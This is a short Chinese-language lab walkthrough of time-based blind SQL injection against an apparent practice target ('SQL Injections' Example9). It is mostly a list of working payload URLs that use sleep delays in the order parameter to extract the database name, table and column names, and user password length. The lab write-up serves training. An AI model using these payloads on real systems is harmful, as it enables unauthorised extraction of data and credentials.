我们打开靶机,选择“SQL Injections”
选择“Example9”
观察页面
盲注的方法如下:
无回显,使用延时注入
注入点
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
payload为
http://192.168.1.142/sqli/example9.php?order=if(length(database())>9,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr(database(),1,1))>101,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>118,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 1,1))>4,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(ascii(substr((select column_name from information_schema.columns where table_name=unhex(7573657273) limit 0,1),1,1))>105,sleep(10),1)%23
http://192.168.1.142/sqli/example9.php?order=if(length((select passwd from users limit 0,1))>5,sleep(10),1)%23
观察靶机的源代码
使用函数过滤sql查询,
可以参考网上的payload